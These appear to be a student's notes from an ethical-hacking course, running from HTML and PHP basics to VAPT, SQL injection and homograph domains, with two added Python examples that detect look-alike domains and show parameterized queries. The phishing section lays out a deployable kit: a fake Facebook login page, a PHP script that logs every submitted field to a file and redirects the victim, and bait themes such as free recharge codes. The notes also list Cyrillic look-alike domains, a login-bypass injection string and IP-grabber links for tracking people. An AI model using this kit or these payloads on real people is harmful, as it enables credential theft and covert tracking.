- WebTechnologies And Basic Components
- ------------------------------------
- 1. Domain Name
- 2. Hosting
- 3. Server
- 4. Database
- 5. Technologies ----> HTML, PHP, JAVASCRIPT
- --->Domain Name----> It is the name of the website that we purchase from a domain name provider ----> godaddy.com, wix, 000webhost
- --->Hosting -----> Place where I keep the content of my website
- --->Servers ----> They help in processing the request and give me a response
- --->Database ----> are the backbone of the web technologies.... these are used to store data in the form of tables and columns
- Technologies
- ------------
- programming and other tools which are used for building my web site
- php, HTML, Javascript, css, angularJS, asp .net
- webpage ---> collection of hyperlinks and hypertext
- website ---> collection of different web pages
- Security
- --------
- 1. SSL certificate ---> HTTPS ---> Secure Socket Layer
- 2. Firewall ----> filter---> malicious data
- 3. IPS and IDS ----> protect against attackers
- IPS = Intrusion Prevention Service
- IDS = Intrusion Detection Service
- hello---> plain text
- algo ---> encrypt ---> secret language
- kijui----> cipher text ----> secret text
- algo ----> decryption ---> secret text to plain text
- hello-----> plain text
- Misconception
- -------------
- 1. HTTPS will not save you
- 2. Firewalls can be easily bypassed
- 3. All anti-malware can be evaded
- Servers ---> Responsible for request and response
- -------
- 1. Microsoft servers ----> IIS + Apache + MSSQL ---> Paid
- 2. Linux Server ---> Apache + Tomcat + MySQL,SQL ---> Both, paid and open source as well
- Windows based server ----> WAMPP
- W ---> Windows
- A ---> Apache
- M ---> MySQL
- P ---> Perl
- P ---> php
- Linux Based server ---> LAMPP
- L ---> Linux
- A ---> Apache
- M ---> MySQL
- P ---> perl
- P ---> PHP
- I don't know which OS it is ---> XAMPP
- X ---> Cross Platform ---> portable software server
- A ---> Apache
- M ---> MySQL
- P ---> perl
- P ---> PHP
- HTML
- ----
- HyperText Markup Language
- <>--->tags ----> markup
- 1. <html>****</html> ----> it defines that my whole syntax is of HTML ---> each and every content of the webpage is written between this tag
- 2. <head>****</head> ----> it defines the header of the webpage
- 3. <title>***</title> ---> it gives the name in the tab --> always under head tag
- 4. <body>***</body>---> it defines the whole content of the body---> this goes outside the head tag
- 5. <p>paragraph</p> ----> it defines a paragraph in the web page
- 6. <br> ---> it gives a new line to my web page.
- 7. <h>****</h> ----> It is used for providing a heading to my webpage content
- 8. <img src=""> ---> to insert an image into a web page
- 9. <a href=""> ----> I am providing a link for my data
- 10. <form>*****</form> ---> it will create a login type form
- <input> ---> different elements
- first.html
- <html>
- <head>
- <title>First Page</title>
- </head>
- <body>
- <a href="https://www.google.com/search?q=dragon+ball+z&client=ubuntu&channel=fs&tbm=isch&source=lnms&sa=X&ved=0ahUKEwjB-IXQ-vvVAhVLIlAKHXznCnYQ_AUICygC&biw=1309&bih=671&dpr=1">
- <h1>Dragon Ball Z</h1>
- </a>
- <a href="https://www.google.com/search?client=ubuntu&channel=fs&biw=1309&bih=671&tbm=isch&sa=1&q=lucifer+&oq=lucifer+&gs_l=psy-ab.3..0i67k1j0l2j0i67k1.31225.32550.0.33264.8.8.0.0.0.0.518.1123.2-1j1j0j1.3.0....0...1.1.64.psy-ab..5.3.1120.9VRWyWn6WqQ">
- <p>Hello, everyone.<br> This is my first web page.<br> My name is Lucifer Morning Star.</p>
- </a>
- <a href="https://www.google.com/search?q=goku&client=ubuntu&channel=fs&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjUxf3B-fvVAhUPU1AKHeNSD0YQ_AUICigB&biw=1309&bih=671"><img src="/home/avi_lucifer/Desktop/goku_by_bpsola-d6j32pk.jpg">
- </a>
- <p>Login Via Facebook Account</p>
- <form action="second.html" method="get">
- username : <input type="text"><br> <br>
- password : <input type="password"><br> <br>
- <input type="submit" onClick="second.html">
- </form>
- </body>
- </html>
- second.html
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p> Welcome to the fake facebook</p>
- </body>
- </html>
- php----> Hypertext preprocessor
- -------------------------------
- Basics of PHP
- ------------------
- PHP is a server side language, which is used to create dynamic website.
- PHP variables → they are temporary memory locations which hold input data.
- Variable name should start with $ sign.
- After the $ sign, there is an alphabet [a-z][A-Z] or underscore(_)
- After that there will be a combination of alphanumeric characters and underscores.
- Eg. $uname = "Abhijeet";
- $s_salary = 30000;
- PHP operators → they are used to manipulate data and variables.
- Arithmetic operator
- + → addition → $a + $b
- - → subtraction → $a - $b
- / → division → $a / $b → quotient
- * → multiplication → $a * $b
- % → modulus → $a % $b → remainder
- Assignment Operator
- = → assign the value → $a = 10
- += → $a += $b → $a = $a + $b
- -= → $a -= $b → $a = $a - $b
- *= → $a *= $b → $a = $a * $b
- /= → $a /= $b → $a = $a / $b
- %= → $a %= $b → $a = $a % $b
- Relational & Comparison Operator
- > → $a > $b
- < → $a < $b
- >= → $a >= $b
- <= → $a <= $b
- == → $a == $b
- != → $a != $b
- Logical Operator
- AND (&&) → when all the conditions are true, then the answer will be true.
- OR (||) → when any one of the conditions is true then the answer is true.
- NOT (!) → It will reverse the value… true to false and false to true.
- PROGRAM
- ----------------
- <?php
- $a = 10;
- $b = 20;
- $sum = $a + $b;
- echo "The sum is ".$sum;
- ?>
- PHP Conditional Statement → they always return some boolean value… either true or false.
- If | Else
- if($a > $b)
- {
- echo "A is greater";
- }
- else
- {
- echo "B is greater";
- }
- If else if else
- if($a>$b && $a>$c)
- {
- echo "A is greater";
- }
- else if ($b>$a && $b>$c)
- {
- echo "B is greater";
- }
- else
- {
- echo "C is greater";
- }
- Nested If Else
- <?php
- $age = 27;
- $gend = "Male";
- if ($age > 25)
- {
- if($gend == "Male")
- {
- echo "Eligible";
- }
- else
- {
- echo "Not eligible";
- }
- }
- else
- {
- echo "Age is not 25 yet";
- }
- ?>
- PHP Loops → Looping is a process for executing multiple statements at a single line or repetition of statements.
- For Loop → in this loop the condition is checked first and then the body is executed. It needs three things for starting this loop → initialization, condition, iteration.
- for(initialization; condition; iteration)
- {
- Statements;
- }
- for($i = 1; $i < 10; $i++)
- {
- echo "likho <br>";
- }
- While Loop → the condition is checked at the start. Returns a boolean value.
- while(condition)
- {
- Statements;
- Iteration;
- }
- $num = 0; // initialize the counter before the loop
- while($num < 5)
- {
- echo $num;
- $num++; // iteration step, otherwise the loop never ends
- }
- PHP Form → it is something like having textbox, labels, radio buttons, check buttons, submit buttons. Wherever you can see any query form, login form, feedback form, they all use PHP form
- Textbox
- Password
- Radiobutton
- Checkbox
- List|Menu
- Textarea
- Filefield
- Submit button
- Reset
- Normal Button
- PHP GET|POST→
- GET → unsecure method, because it displays the form field values in the URL. Uses up to 1mb. Fast process.
- POST → It is a secure method. Large amounts of data can be sent. It is a slow process.
- tracing and tracking
- --------------------
- tracing---> terrorist--mail--PM
- "I will plant a bomb in your house and run away"
- who sent it ---- from where he sent it
- tracking---> the PM reported it... from where, when and by whom it was sent
- fuglikous.com
- whoreadme.com
- user agent---> browsers that the person is using for surfing the internet
- VAPT
- ---
- V = Vulnerability
- A = Assessment
- P = Penetration
- T = Testing
- VA+PT
- VA--> we generate a report on the loopholes and weak points... from where we can get access to the machine or device----> vulnerabilities, loopholes, weak points---> not hacking, only report generation
- PT--> Penetration Testing--> we hack into the systems and exploit them as per the VA report--> it is purely hacking
- owasp top 10
- ------------
- open web application security project
- DBMS---> Data Base Management System
- database is the backbone of any website or server where my data is stored in the form of tables and columns
- SQL---> Structured Query Language
- it is a query language via which I can fetch the data from the database from a specific table and a specific column---> I take exactly what I need
- SELECT trains FROM train_Database WHERE source="Delhi" AND destination="mumbai" AND date="7september" AND class="3AC"
- DVWA--> Damn Vulnerable Web Application
- it's a firmware/application which is used to check the PT skill of a candidate
- whenever I set up my device as a server ---- I access the server from localhost or the loopback address, which is 127.0.0.1
- localhost
- varchar==> variable + character---> House number G-33, street Number &
- select, insert, update, delete, and, or
- sql injection--->
- Phishing
- --------
- Fish----> we give bait to the people and hack their data
- PHISHING ---> It is the process of creating a fake web page, and through that web page we can get the user's credentials....
- How To Deploy It
- ----------------
- We will create an account
- HTML, css, js.....
- Game Of Throne download page
- adult worker
- paytm recharge code
- discount coupons
- ola cabs free share pass
- uthaLo.php
- <?php -----> it is a php file and php script
- header ('Location: http://www.facebook.com'); ----> when my php script has finished its work, I will leave the user on this site
- $handle = fopen("log.txt", "a"); ------> I am creating the file
- foreach($_POST as $variable => $value) ---> getting all the data in a loop
- {
- fwrite($handle, $variable); ---> 1 variable
- fwrite($handle, "="); ----> = 2
- fwrite($handle, $value); ----> data write 3
- fwrite($handle, "\r\n"); ---->4 new line
- }
- fwrite($handle, "\r\n"); --> to write a new line
- fclose($handle); ---> close it... log.txt
- exit; ----> work finished.... take the user to the location
- ?> ---> end of php
- $handle ---> variable name
- fopen ---> to open a file
- Attribute in file
- r ---> read --> I can only read
- w ---> write --> it will create a new file if the name does not exist... else it will overwrite the old file
- a ---> append ---> it works just like write, but it never deletes or overwrites the file; it continues writing in the same file
- username=sdxjkchvs@gmail.com
- password=liadsjkvcabl
- IDN Homograph Attack
- --------------------
- IDN --> Internationalized Domain Name
- India has many languages..... hindi and punjabi.....
- World has many languages----> Cyrillic, Greek, Arabic, English.......
- Many alphabets have letters that look the same as English characters
- The Russian letters а, с, е, о, р, х and у
- are identical to a, c, e, o, p, x and y.
- d
- dеерikа раdukоnе
- рауtm.com
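- A defender-side check for the look-alike domains above, written in Python as an added example (not part of the original notes). The PROTECTED set and the sample domains are constructed; the letter map covers only the seven Cyrillic letters listed in the notes.

```python
import unicodedata

# The Cyrillic letters listed in the notes, mapped to the Latin letters they imitate.
CONFUSABLES = {"\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o",
               "\u0440": "p", "\u0445": "x", "\u0443": "y"}

def decode_label(label):
    """Turn an 'xn--' (punycode) label back into the Unicode the user sees."""
    if label.startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label  # malformed punycode: keep the raw label
    return label

def scripts_in(label):
    """Scripts used by the letters of one label, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0]
            for ch in label if ch.isalpha()}

def check_domain(domain, protected):
    """Compare a domain with a set of protected (real) domains.

    The returned 'verdict' is 'ok', 'lookalike' or 'mixed-script'.
    """
    labels = [decode_label(l) for l in domain.lower().rstrip(".").split(".")]
    decoded = ".".join(labels)
    # Skeleton: replace every known look-alike letter with its Latin twin.
    skeleton = "".join(CONFUSABLES.get(ch, ch) for ch in decoded)
    mixed = [l for l in labels if len(scripts_in(l)) > 1]
    if decoded in protected:
        verdict = "ok"
    elif skeleton in protected:
        verdict = "lookalike"       # renders like a protected domain
    elif mixed:
        verdict = "mixed-script"    # one label mixes alphabets
    else:
        verdict = "ok"
    return {"decoded": decoded, "skeleton": skeleton, "verdict": verdict}

if __name__ == "__main__":
    PROTECTED = {"paytm.com"}  # constructed allow-list of real domains
    # Constructed samples: real name, Cyrillic look-alike, all-Cyrillic label.
    for d in ["paytm.com", "\u0440\u0430\u0443tm.com",
              "\u043f\u0440\u0438\u043c\u0435\u0440.com"]:
        print(ascii(d), check_domain(d, PROTECTED)["verdict"])
```
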
- A mail arrived.... you will be dead in the evening--->
- I will find from where this email has been sent -----> tracing
- now I will reply to the person with a mail.... and by that mail I will try to find the person or try to gather the information ----> tracking
- grabify ---> https://grabify.link/
- fuglekus ---> www.fuglekos.com/ip-grabber
- mage [goku.jpg] successfully uploaded!
- Folder name [2017-8-30]
- Your image 'goku.jpg'
- in folder '2017-8-30' has been uploaded.
- whoreadme----> tracking
- Plain Text ----> Hello
- Ciphers ---> encrypting my messages....----> aheel ----> key ---> mail
- key ----> decrypt
- Authentication Bypass
- -----------------------
- I will log in as the administrator and can have whatever I want to have...
- GATES ----> AND, OR
- AND ---> if any of the values is 0 then the answer will be 0
- A AND B ANS
- 0 0 0
- 0 1 0
- 1 0 0
- 1 1 1
- OR ---> If any of the values is 1 then the answer will be 1
- A OR B ANS
- 0 0 0
- 0 1 1
- 1 0 1
- 1 1 1
- admin 'and' 1'or'1'='1
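- How the AND/OR tables above decide a login query, shown in Python with an in-memory SQLite database as an added example (not part of the original notes): a concatenated query next to its parameterized fix. The users table, its stored password and the function names are constructed, and the password is stored in plain text only to keep the example short.

```python
import sqlite3

def make_db():
    """Constructed one-user database held in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    """Builds the query by string concatenation (the weak pattern)."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    # With password 1'or'1'='1 the WHERE clause becomes
    #   username = 'admin' AND password = '1' OR '1' = '1'
    # AND binds tighter than OR, so it reads (A AND B) OR 1,
    # and the OR table says that anything OR 1 is 1: every row matches.
    return sql, db.execute(sql).fetchone() is not None

def login_parameterized(db, username, password):
    """Same check with placeholders: the input stays data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    crafted = "1'or'1'='1"  # the input fragment from the notes
    sql, ok = login_vulnerable(db, "admin", crafted)
    print(sql)
    print("concatenated query accepts it:", ok)
    print("parameterized query accepts it:",
          login_parameterized(db, "admin", crafted))
    print("parameterized query, real password:",
          login_parameterized(db, "admin", "s3cret-constructed"))
```
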